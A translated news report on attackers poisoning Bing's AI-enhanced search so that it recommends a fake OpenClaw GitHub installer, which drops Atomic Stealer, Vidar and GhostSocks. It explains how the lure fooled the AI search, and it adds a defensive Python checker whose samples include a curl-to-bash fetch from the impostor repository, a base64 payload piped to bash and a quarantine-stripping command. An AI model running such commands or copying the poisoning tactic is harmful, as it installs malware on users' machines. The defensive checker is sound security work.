The report states that Microsoft Bing's search results have been poisoned into recommending a malicious fake installer for the OpenClaw AI project.

IT Home, March 6 news: Tech outlet BleepingComputer published a post yesterday (March 5) reporting that Microsoft Bing's AI-enhanced search feature has been poisoned: its results recommended a fake OpenClaw installer hosted on GitHub.

Researchers at the cybersecurity firm Huntress found last month that when users searched Bing for the keyword OpenClaw, the results recommended a fake project page hosted on GitHub.

OpenClaw itself is a widely used open-source AI agent. It acts as a personal assistant that performs all kinds of tasks and runs with broad permissions, including access to local files and integrations with email, messaging apps, and online services.

Attackers saw these broad system permissions as an opportunity to steal sensitive information and began publishing malicious installation instructions and fake installer packages on platforms such as GitHub.

Huntress's analysis found that the attackers carefully disguised these malicious GitHub repositories to fool both AI systems and human users. They created a dedicated GitHub organization named "openclaw-installer" and copied the source code of the real project to make the repositories look legitimate.

The researchers emphasized that simply hosting malware under newly created, legitimate-looking GitHub accounts was enough to poison Bing AI's search results and earn a recommendation.

The attackers tailored their payloads to the victim's operating system. For macOS users, the malicious repository offers a fake installation guide that tells them to paste bash commands into the terminal; running those commands downloads the Atomic Stealer information stealer. An install snippet that arrives via a search result rather than the project's own repository deserves a read-through before it is executed, not a blind paste.

Windows users are served a forged "OpenClaw_x64.exe" that silently loads the Vidar information stealer in memory to harvest account data and installs the GhostSocks malware, which turns the victim's machine into an attacker-controlled proxy node.
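As an added example (not code from Huntress, BleepingComputer, or the OpenClaw project), the following Python script triages a paste-to-terminal install snippet of the kind the article describes before anyone runs it. It flags remote content piped into a shell, base64-decoded payloads handed to a shell, removal of the macOS quarantine attribute, and GitHub URLs whose owner is not the project's real account. The trusted owner name "example-real-owner" is a placeholder assumption (the article names only the impostor organization "openclaw-installer"), and the three sample snippets are constructed for illustration; the "impostor" one mimics the shape of the lure but is not the real command and nothing is downloaded.

```python
"""Triage helper for 'paste this into your terminal' install snippets.

Added example for this article; not code from Huntress, Microsoft, or the
OpenClaw project. The trusted-owner allowlist and the sample snippets are
constructed assumptions.
"""
import re
from typing import List, Optional
from urllib.parse import urlparse

# Assumption (hypothetical): the GitHub account of the genuine project.
# The article names only the impostor organisation, "openclaw-installer".
TRUSTED_GITHUB_OWNERS = {"example-real-owner"}

URL_RE = re.compile(r"https?://[^\s|;&)'\"]+")
FETCH_RE = re.compile(r"^\s*(curl|wget)\b")               # pipeline stage that downloads
SHELL_RE = re.compile(r"^\s*(sudo\s+)?(bash|sh|zsh)\b")   # pipeline stage that executes
B64_RE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")     # obfuscated payload
QUARANTINE_RE = re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b")


def split_pipeline(cmd: str) -> List[str]:
    """Split a one-liner on single '|' (not '||'). Enough for typical
    install snippets; quoted pipes are not handled."""
    return re.split(r"(?<!\|)\|(?!\|)", cmd)


def github_owner(url: str) -> Optional[str]:
    """Return the account segment of a github.com or
    raw.githubusercontent.com URL, or None for any other host."""
    parsed = urlparse(url)
    if parsed.hostname not in {"github.com", "raw.githubusercontent.com"}:
        return None
    parts = [seg for seg in parsed.path.split("/") if seg]
    return parts[0] if parts else None


def triage(cmd: str) -> List[str]:
    """Return finding codes for a snippet. An empty list means none of the
    checks fired, not that the command is safe."""
    findings: List[str] = []
    segments = split_pipeline(cmd)
    for i, seg in enumerate(segments):
        if SHELL_RE.match(seg):
            earlier = segments[:i]
            if any(FETCH_RE.match(s) for s in earlier):
                findings.append("remote-pipe-to-shell")
            if any(B64_RE.search(s) for s in earlier):
                findings.append("base64-payload-to-shell")
    if QUARANTINE_RE.search(cmd):
        findings.append("strips-macos-quarantine")
    for url in URL_RE.findall(cmd):
        owner = github_owner(url)
        if owner is None:
            findings.append(f"non-github-host:{urlparse(url).hostname or ''}")
        elif owner not in TRUSTED_GITHUB_OWNERS:
            findings.append(f"untrusted-github-owner:{owner}")
    return list(dict.fromkeys(findings))  # de-duplicate, keep order


# Constructed samples. "impostor-curl-pipe" imitates the shape of the lure
# described in the article; it is not the real command.
SAMPLES = {
    "clone-and-review": (
        "git clone https://github.com/example-real-owner/openclaw.git "
        "&& cd openclaw && less install.sh"
    ),
    "impostor-curl-pipe": (
        "curl -fsSL https://raw.githubusercontent.com/openclaw-installer/"
        "openclaw/main/install.sh | bash"
    ),
    "obfuscated": (
        "echo 'ZWNobyBoaQo=' | base64 -d | bash "
        "&& xattr -d com.apple.quarantine ./OpenClaw.app"
    ),
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name}: {triage(cmd) or 'no findings'}")
```

The checks are deliberately pattern-based and conservative: a clean result only means the snippet does not match these specific tricks. The GitHub-owner check is the one that applies to the Windows lure as well, since the forged executable is also served from the impostor organization's repository.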

IT Home note: the original article only says that Microsoft Bing was "poisoned"; it contains nothing about Google Search.
